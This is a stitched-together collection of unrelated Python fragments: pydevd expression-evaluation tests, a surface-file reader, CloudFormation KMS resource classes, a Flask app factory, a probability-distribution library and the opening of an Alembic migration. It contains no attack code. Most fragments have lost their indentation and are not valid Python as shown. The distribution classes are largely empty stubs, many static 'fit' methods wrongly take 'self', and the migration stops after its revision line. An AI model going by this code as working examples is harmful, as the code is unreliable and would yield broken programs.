for varname in ['container', 'results', 's']:
assert varname in sys._getframe().f_globals
for varname in ['container', 'results', 's']:
del sys._getframe().f_globals[varname]
def test_evaluate_expression_2(disable_critical_log):
from _pydevd_bundle.pydevd_vars import evaluate_expression
def check(frame):
eval_txt = 'all((x in (BAR, FOO) for x in SOME_LST))'
assert evaluate_expression(None, frame, eval_txt, is_exec=False)
check(next(iter(obtain_frame())))
check(global_frame)
def test_evaluate_expression_3(disable_critical_log):
if not IS_PY38_OR_GREATER:
return
from _pydevd_bundle.pydevd_vars import evaluate_expression
def check(frame):
eval_txt = '''11 if (some_var := 22) else 33'''
assert evaluate_expression(None, frame, eval_txt, is_exec=False) == 11
check(next(iter(obtain_frame())))
assert 'some_var' not in sys._getframe().f_globals
# as locals == globals, this will also change the current globals
check(global_frame)
assert 'some_var' in sys._getframe().f_globals
del sys._getframe().f_globals['some_var']
assert 'some_var' not in sys._getframe().f_globals
def test_evaluate_expression_4(disable_critical_log):
from _pydevd_bundle.pydevd_vars import evaluate_expression
def check(frame):
eval_txt = '''import email;email.foo_value'''
with pytest.raises(AttributeError):
evaluate_expression(None, frame, eval_txt, is_exec=True)
assert 'email' in frame.f_locals
check(next(iter(obtain_frame())))
assert 'email' not in sys._getframe().f_globals
# as locals == globals, this will also change the current globals
check(global_frame)
assert 'email' in sys._getframe().f_globals
del sys._getframe().f_globals['email']
assert 'email' not in sys._getframe().f_globals
|
def readSurface(name):
    """Read the files 'name'.vertices and 'name'.triangles and return a list
    of 6-float tuples (x, y, z, nx, ny, nz) for vertices and a list of
    3-int tuples for triangles."""
    with open(name + ".vertices") as f:
        vdata = [
            (float(x[0]), float(x[1]), float(x[2]),
             float(x[3]), float(x[4]), float(x[5]))
            for x in (line.split() for line in f)
        ]
    with open(name + ".triangles") as f:
        tdata = [
            (int(x[0]), int(x[1]), int(x[2]))
            for x in (line.split() for line in f)
        ]
    return vdata, tdata
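# Hypothetical usage (the "surf" prefix is an assumption: surf.vertices and
# surf.triangles must exist alongside the script).
if __name__ == "__main__":
    vertices, triangles = readSurface("surf")
    print(len(vertices), "vertices,", len(triangles), "triangles")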
|
from . import AWSObject, AWSProperty
from .validators import *
from .constants import *
# -------------------------------------------
class KMSKey(AWSObject):
"""# AWS::KMS::Key - CloudFormationResourceSpecification version: 1.4.0
{
"Attributes": {
"Arn": {
"PrimitiveType": "String"
}
},
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html",
"Properties": {
"Description": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-description",
"PrimitiveType": "String",
"Required": false,
"UpdateType": "Mutable"
},
"EnableKeyRotation": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-enablekeyrotation",
"PrimitiveType": "Boolean",
"Required": false,
"UpdateType": "Mutable"
},
"Enabled": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-enabled",
"PrimitiveType": "Boolean",
"Required": false,
"UpdateType": "Mutable"
},
"KeyPolicy": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-keypolicy",
"PrimitiveType": "Json",
"Required": true,
"UpdateType": "Mutable"
},
"KeyUsage": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-keyusage",
"PrimitiveType": "String",
"Required": false,
"UpdateType": "Immutable"
}
}
}
"""
resource_type = "AWS::KMS::Key"
props = {
'Description': (basestring, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-description'),
'EnableKeyRotation': (boolean, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-enablekeyrotation'),
'Enabled': (boolean, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-enabled'),
'KeyPolicy': ((basestring, dict), True, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-keypolicy'),
'KeyUsage': (basestring, False, 'Immutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-key.html#cfn-kms-key-keyusage')
}
# -------------------------------------------
class KMSAlias(AWSObject):
"""# AWS::KMS::Alias - CloudFormationResourceSpecification version: 1.4.0
{
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-alias.html",
"Properties": {
"AliasName": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-alias.html#cfn-kms-alias-aliasname",
"PrimitiveType": "String",
"Required": true,
"UpdateType": "Immutable"
},
"TargetKeyId": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-alias.html#cfn-kms-alias-targetkeyid",
"PrimitiveType": "String",
"Required": true,
"UpdateType": "Mutable"
}
}
}
"""
resource_type = "AWS::KMS::Alias"
props = {
'AliasName': (basestring, True, 'Immutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-alias.html#cfn-kms-alias-aliasname'),
'TargetKeyId': (basestring, True, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kms-alias.html#cfn-kms-alias-targetkeyid')
}
|
"""arsenal.app - application factory"""
from flask import Flask
from flask_gravatar import Gravatar
from flask_moment import Moment
from flask_pure import Pure
from flask_simplemde import SimpleMDE
from .forum import forum
from .user import user, init_app as user_init_app
from .models import init_app as models_init_app
def create_app(config_filename):
"""application factory"""
app = Flask(__name__, instance_relative_config=True)
app.config.from_pyfile(config_filename)
models_init_app(app)
user_init_app(app)
Gravatar(app, default='identicon')
Moment(app)
Pure(app)
SimpleMDE(app)
app.register_blueprint(forum, url_prefix='/t')
app.register_blueprint(user, url_prefix='/u')
return app
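# Hypothetical local entry point (not part of the original factory module); the
# instance-relative config filename "config.py" is an assumption for illustration.
if __name__ == "__main__":
    create_app("config.py").run(debug=True)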
|
from abc import ABC, abstractmethod
from typing import NamedTuple, Optional
import numpy as np
from scipy import special
from scipy.special import beta, digamma, erf, erfinv, hyp2f1
from scipy.stats import uniform
def check_is_probability(x):
    """Raise if any value of x lies outside the closed interval [0, 1]."""
    if np.any((np.asarray(x) < 0) | (np.asarray(x) > 1)):
        raise ValueError("values must be probabilities in [0, 1]")
class Interval:
pass
class ContinuousInterval(NamedTuple):
lower: float
upper: float
class DiscreteInterval(NamedTuple):
lower: int
upper: int
class Distribution(ABC):
@abstractmethod
def mean(self) -> float:
pass
@abstractmethod
def var(self) -> float:
pass
@abstractmethod
def std(self) -> float:
pass
@abstractmethod
def median(self) -> float:
pass
@abstractmethod
def entropy(self) -> float:
pass
@abstractmethod
def support(self) -> Interval:
pass
@abstractmethod
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
@abstractmethod
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
@abstractmethod
def sf(self, x: np.ndarray) -> np.ndarray:
pass
@abstractmethod
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
@abstractmethod
def fit(dataset: np.ndarray) -> 'Distribution':
    pass
class ContinuousDistribution(Distribution):
@abstractmethod
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
class DiscreteDistribution(Distribution):
@abstractmethod
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
class Uniform(ContinuousDistribution):
def __init__(self, lower, upper) -> None:
self.lower = lower
self.upper = upper
def mean(self) -> float:
return (self.lower + self.upper) / 2
def var(self) -> float:
return pow(self.upper - self.lower, 2) / 12
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.mean()
def entropy(self) -> float:
return np.log(self.upper - self.lower)
def support(self) -> ContinuousInterval:
return ContinuousInterval(self.lower, self.upper)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
dist = uniform(self.lower, (self.upper - self.lower))
return dist.rvs(size, random_state=random_state)
def pdf(self, x: np.ndarray) -> np.ndarray:
constant = 1 / (self.upper - self.lower)
density = np.where((x < self.lower) | (x > self.upper), 0.0, constant)
return density
def cdf(self, x: np.ndarray) -> np.ndarray:
value = (x - self.lower) / (self.upper - self.lower)
return np.clip(value, 0.0, 1.0)
def sf(self, x: np.ndarray) -> np.ndarray:
return 1 - self.cdf(x)
def ppf(self, x: np.ndarray) -> np.ndarray:
check_is_probability(x)
return self.lower + x * (self.upper - self.lower)
@staticmethod
def fit(dataset: np.ndarray) -> 'Uniform':
    return Uniform(lower=dataset.min(), upper=dataset.max())
class Normal(ContinuousDistribution):
def __init__(self, mean, std) -> None:
self.mean_ = mean
self.std_ = std
def mean(self) -> float:
return self.mean_
def var(self) -> float:
return self.std_ ** 2
def std(self) -> float:
return self.std_
def median(self) -> float:
return self.mean_
def entropy(self) -> float:
return 0.5 * np.log(2 * np.pi * np.e * pow(self.std_, 2))
def support(self) -> ContinuousInterval:
return ContinuousInterval(-np.inf, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
p = uniform(0, 1).rvs(size, random_state=random_state)
return self.ppf(p)
def pdf(self, x: np.ndarray) -> np.ndarray:
const = 1 / (self.std_ * pow(2 * np.pi, 0.5))
func = np.exp(-0.5 * np.square((x - self.mean_) / self.std_))
return const * func
def cdf(self, x: np.ndarray) -> np.ndarray:
return 0.5 * (1 + erf((x - self.mean_) / (self.std_ * pow(2, 0.5))))
def sf(self, x: np.ndarray) -> np.ndarray:
return 1 - self.cdf(x)
def ppf(self, x: np.ndarray) -> np.ndarray:
check_is_probability(x)
A = self.std_ * pow(2, 0.5) * erfinv(2 * x - 1)
return self.mean_ + A
@staticmethod
def fit(dataset: np.ndarray) -> 'Normal':
    mu = dataset.mean()
    sigma = dataset.std(ddof=1)
    return Normal(mean=mu, std=sigma)
class StudentT(ContinuousDistribution):
def __init__(self, df, loc, scale) -> None:
self.df = df
self.loc = loc
self.scale = scale
def mean(self) -> float:
if self.df > 1:
return self.loc
return np.nan
def var(self) -> float:
if self.df > 2:
return pow(self.scale, 2) * self.df / (self.df - 2)
elif self.df > 1:
return np.inf
return np.nan
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.loc
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> ContinuousInterval:
return ContinuousInterval(-np.inf, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
p = uniform(0, 1).rvs(size, random_state=random_state)
return self.ppf(p)
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
return 1 - self.cdf(x)
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'StudentT':
pass
class Laplace(ContinuousDistribution):
def __init__(self, mu, b) -> None:
self.mu = mu
self.b = b
def mean(self) -> float:
return self.mu
def var(self) -> float:
return 2 * pow(self.b, 2)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.mu
def entropy(self) -> float:
return np.log(2 * self.b * np.e)
def support(self) -> ContinuousInterval:
return ContinuousInterval(-np.inf, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Logistic(ContinuousDistribution):
def __init__(self, loc, scale) -> None:
self.loc = loc
self.scale = scale
def mean(self) -> float:
return self.loc
def var(self) -> float:
return pow(self.scale, 2) * pow(np.pi, 2) / 3
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.loc
def entropy(self) -> float:
return np.log(self.scale) + 2
def support(self) -> ContinuousInterval:
return ContinuousInterval(-np.inf, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Cauchy(ContinuousDistribution):
def __init__(self, loc, scale) -> None:
self.loc = loc
self.scale = scale
def mean(self) -> float:
return np.nan
def var(self) -> float:
return np.nan
def std(self) -> float:
return np.nan
def median(self) -> float:
return self.loc
def entropy(self) -> float:
return np.log(4 * np.pi * self.scale)
def support(self) -> ContinuousInterval:
return ContinuousInterval(-np.inf, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Exponential(ContinuousDistribution):
def __init__(self, rate) -> None:
self.rate = rate
def mean(self) -> float:
return 1 / self.rate
def var(self) -> float:
return 1 / pow(self.rate, 2)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return np.log(2) / self.rate
def entropy(self) -> float:
return 1 - np.log(self.rate)
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Pareto(ContinuousDistribution):
def __init__(self, xmin, shape) -> None:
self.xmin = xmin
self.shape = shape
def mean(self) -> float:
if self.shape <= 1:
return np.inf
return self.shape * self.xmin / (self.shape - 1)
def var(self) -> float:
if self.shape <= 2:
return np.inf
num = pow(self.xmin, 2) * self.shape
den = pow(self.shape - 1, 2) * (self.shape - 2)
return num / den
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.xmin * pow(2, 1 / self.shape)
def entropy(self) -> float:
A = self.xmin / self.shape
B = np.exp(1 + 1 / self.shape)
return np.log(A * B)
def support(self) -> ContinuousInterval:
return ContinuousInterval(self.xmin, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Lomax(ContinuousDistribution):
def __init__(self, shape, scale) -> None:
self.shape = shape
self.scale = scale
def mean(self) -> float:
if self.shape > 1:
return self.scale / (self.shape - 1)
return np.nan
def var(self) -> float:
if self.shape <= 1:
return np.nan
elif self.shape <= 2:
return np.inf
A = pow(self.scale, 2) * self.shape
B = pow(self.shape - 1, 2) * (self.shape - 2)
return A / B
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.scale * (pow(2, 1 / self.shape) - 1)
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class LogNormal(ContinuousDistribution):
def __init__(self, mean, std) -> None:
self.mean_ = mean
self.std_ = std
def mean(self) -> float:
return np.exp(self.mean_ + pow(self.std_, 2) / 2)
def var(self) -> float:
A = np.exp(pow(self.std_, 2)) - 1
B = np.exp(2 * self.mean_ + pow(self.std_, 2))
return A * B
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return np.exp(self.mean_)
def entropy(self) -> float:
A = self.std_ * pow(2 * np.pi, 0.5) * np.exp(self.mean_ + 0.5)
return np.log(A) / np.log(2)
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Weibull(ContinuousDistribution):
def __init__(self, scale, shape) -> None:
self.scale = scale
self.shape = shape
def mean(self) -> float:
return self.scale * special.gamma(1 + 1 / self.shape)
def var(self) -> float:
A = special.gamma(1 + 2 / self.shape)
B = special.gamma(1 + 1 / self.shape)
return pow(self.scale, 2) * (A - pow(B, 2))
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.scale * pow(np.log(2), 1 / self.shape)
def entropy(self) -> float:
A = np.euler_gamma * (1 - 1 / self.shape)
B = np.log(self.scale / self.shape)
return A + B + 1
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class Gamma(ContinuousDistribution):
def __init__(self, alpha, beta) -> None:
self.alpha = alpha
self.beta = beta
def mean(self) -> float:
return self.alpha / self.beta
def var(self) -> float:
return self.alpha / pow(self.beta, 2)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
A = self.alpha - np.log(self.beta) + special.gammaln(self.alpha)
B = (1 - self.alpha) * special.digamma(self.alpha)
return A + B
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> 'Distribution':
pass
class ChiSquare(ContinuousDistribution):
def __init__(self, k) -> None:
self.k = k
def mean(self) -> float:
return self.k
def var(self) -> float:
return 2 * self.k
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
A = self.k / 2 + np.log(2 * special.gamma(self.k / 2))
B = (1 - self.k / 2) * special.digamma(self.k / 2)
return A + B
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Beta(ContinuousDistribution):
def __init__(self, alpha, beta) -> None:
self.alpha = alpha
self.beta = beta
def mean(self) -> float:
return self.alpha / (self.alpha + self.beta)
def var(self) -> float:
A = self.alpha * self.beta
B = pow(self.alpha + self.beta, 2) * (self.alpha + self.beta + 1)
return A / B
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
A = special.betaln(self.alpha, self.beta)
B = (self.alpha - 1) * special.digamma(self.alpha)
C = (self.beta - 1) * special.digamma(self.beta)
D = (self.alpha + self.beta - 2) * \
special.digamma(self.alpha + self.beta)
return A - B - C + D
def support(self) -> ContinuousInterval:
return ContinuousInterval(0, 1)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pdf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Bernoulli(DiscreteDistribution):
def __init__(self, p) -> None:
self.p = p
def mean(self) -> float:
return self.p
def var(self) -> float:
return self.p * (1 - self.p)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
if self.p < 0.5:
return 0
elif self.p > 0.5:
return 1
return self.p
def entropy(self) -> float:
return -((1 - self.p) * np.log(1 - self.p) + self.p * np.log(self.p))
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, 1)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Binomial(DiscreteDistribution):
def __init__(self, p, n) -> None:
self.p = p
self.n = n
def mean(self) -> float:
return self.p * self.n
def var(self) -> float:
return self.p * (1 - self.p) * self.n
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return self.mean()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, self.n)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Hypergeometric(DiscreteDistribution):
def __init__(self, n, N, K) -> None:
self.n = n
self.N = N
self.K = K
def mean(self) -> float:
return self.n * self.K / self.N
def var(self) -> float:
A = self.n * self.K / self.N
B = (self.N - self.K) / self.N
C = (self.N - self.n) / (self.N - 1)
return A * B * C
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(max(0, self.n + self.K - self.N), min(self.n, self.K))
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Geometric(DiscreteDistribution):
def __init__(self, p) -> None:
self.p = p
def mean(self) -> float:
return (1 - self.p) / self.p
def var(self) -> float:
return (1 - self.p) / pow(self.p, 2)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
return np.ceil(-1 / np.log2(1 - self.p)) - 1
def entropy(self) -> float:
return -((1 - self.p) * np.log(1 - self.p) + self.p * np.log(self.p)) / self.p
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Poisson(DiscreteDistribution):
def __init__(self, rate) -> None:
self.rate = rate
def mean(self) -> float:
return self.rate
def var(self) -> float:
return self.rate
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class ZeroInflatedPoisson(DiscreteDistribution):
def __init__(self, rate, p) -> None:
self.rate = rate
self.p = p
def mean(self) -> float:
return (1 - self.p) * self.rate
def var(self) -> float:
return self.rate * (1 - self.p) * (1 + self.p * self.rate)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class NegativeBinomial(DiscreteDistribution):
def __init__(self, p, r) -> None:
self.p = p
self.r = r
def mean(self) -> float:
return self.p * self.r / (1 - self.p)
def var(self) -> float:
return self.p * self.r / pow(1 - self.p, 2)
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class NegativeHypergeometric(DiscreteDistribution):
def __init__(self, r, N, K) -> None:
self.r = r
self.N = N
self.K = K
def mean(self) -> float:
return self.r * self.K / (self.N - self.K + 1)
def var(self) -> float:
num = self.r * (self.N + 1) * self.K
den = (self.N - self.K + 1) * (self.N - self.K + 2)
A = num / den
B = 1 - self.r / (self.N - self.K + 1)
return A * B
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, self.K)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
class Zeta(DiscreteDistribution):
def __init__(self, shape) -> None:
self.shape = shape
def mean(self) -> float:
if self.shape > 2:
return special.zeta(self.shape - 1) / special.zeta(self.shape)
raise NotImplementedError()
def var(self) -> float:
if self.shape > 3:
A = special.zeta(self.shape)
B = special.zeta(self.shape - 2)
C = pow(special.zeta(self.shape - 1), 2)
return (A * B - C) / pow(A, 2)
raise NotImplementedError()
def std(self) -> float:
return np.sqrt(self.var())
def median(self) -> float:
raise NotImplementedError()
def entropy(self) -> float:
raise NotImplementedError()
def support(self) -> DiscreteInterval:
return DiscreteInterval(0, np.inf)
def sample(self, size: int = 1, random_state: Optional[int] = None) -> np.ndarray:
pass
def pmf(self, x: np.ndarray) -> np.ndarray:
pass
def cdf(self, x: np.ndarray) -> np.ndarray:
pass
def sf(self, x: np.ndarray) -> np.ndarray:
pass
def ppf(self, x: np.ndarray) -> np.ndarray:
pass
@staticmethod
def fit(self, dataset: np.ndarray) -> Distribution:
pass
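# Minimal usage sketch (not part of the original module), exercising the two
# fully implemented distributions above; the sample size and seed are arbitrary.
if __name__ == "__main__":
    data = Normal(mean=0.0, std=1.0).sample(size=1000, random_state=0)
    fitted = Normal.fit(data)
    print("fitted mean/std:", fitted.mean(), fitted.std())
    print("P(X <= 0) =", fitted.cdf(np.array([0.0]))[0])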
|
"""Logging tools and PII scrubber."""
|
# Copyright 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""ha_for_routing_service_in_cisco_devices
Revision ID: 1e9e22602685
Revises: 53f08de0523f
Create Date: 2015-09-28 09:33:27.294138
"""
# revision identifiers, used by Alembic.
revision = '1e9e22602685'
